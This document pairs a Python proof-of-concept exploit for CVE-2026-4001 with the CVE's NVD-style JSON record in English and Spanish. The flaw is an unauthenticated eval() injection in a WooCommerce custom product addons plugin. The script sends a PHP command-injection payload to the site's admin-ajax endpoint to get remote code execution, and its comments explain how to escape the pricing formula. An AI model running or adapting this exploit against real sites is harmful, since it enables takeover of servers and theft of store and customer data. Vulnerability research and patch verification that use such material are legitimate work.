CVE-2026-4001

import requests # PoC for CVE-2026-4001: Woocommerce Custom Product Addons Pro RCE # Description: Exploits eval() injection in custom pricing formula. # Target: Unauthenticated users submitting to a product with custom pricing. target_url = "http://example.com/wp-admin/admin-ajax.php" # The payload injects PHP code. If the formula is '{this.value}', # injecting '1; phpinfo();' will execute phpinfo(). # If the formula involves math, breaking out with ') or ;' is needed. payload = "1; system('whoami'); //" data = { "action": "wcpa_calculate_price", "product_id": "1", "wcpa_field": { "value": payload, "pricing_type": "custom", "formula": "{this.value}" } } response = requests.post(target_url, json=data) if response.status_code == 200: print("[+] Payload sent. Check response for execution results.") print(response.text) else: print("[-] Request failed.")

{"cve": {"id": "CVE-2026-4001", "sourceIdentifier": "[email protected]", "published": "2026-03-24T00:16:31.040", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Woocommerce Custom Product Addons Pro plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 5.4.1 via the custom pricing formula eval() in the process_custom_formula() function within includes/process/price.php. This is due to insufficient sanitization and validation of user-submitted field values before passing them to PHP's eval() function. The sanitize_values() method strips HTML tags but does not escape single quotes or prevent PHP code injection. This makes it possible for unauthenticated attackers to execute arbitrary code on the server by submitting a crafted value to a WCPA text field configured with custom pricing formula (pricingType: \"custom\" with {this.value})."}, {"lang": "es", "value": "El plugin Woocommerce Custom Product Addons Pro para WordPress es vulnerable a ejecución remota de código en todas las versiones hasta la 5.4.1, inclusive, a través de la fórmula de precios personalizada eval() en la función process_custom_formula() dentro de includes/process/price.php. Esto se debe a una sanitización y validación insuficientes de los valores de campo enviados por el usuario antes de pasarlos a la función eval() de PHP. El método sanitize_values() elimina las etiquetas HTML pero no escapa las comillas simples ni previene la inyección de código PHP. Esto hace posible que atacantes no autenticados ejecuten código arbitrario en el servidor al enviar un valor manipulado a un campo de texto de WCPA configurado con una fórmula de precios personalizada (pricingType: 'custom' con {this.value})."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-95"}]}], "references": [{"url": "https://acowebs.com/woo-custom-product-addons/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/70a2b6ff-defc-4722-9af9-3cae94e98632?source=cve", "source": "[email protected]"}]}}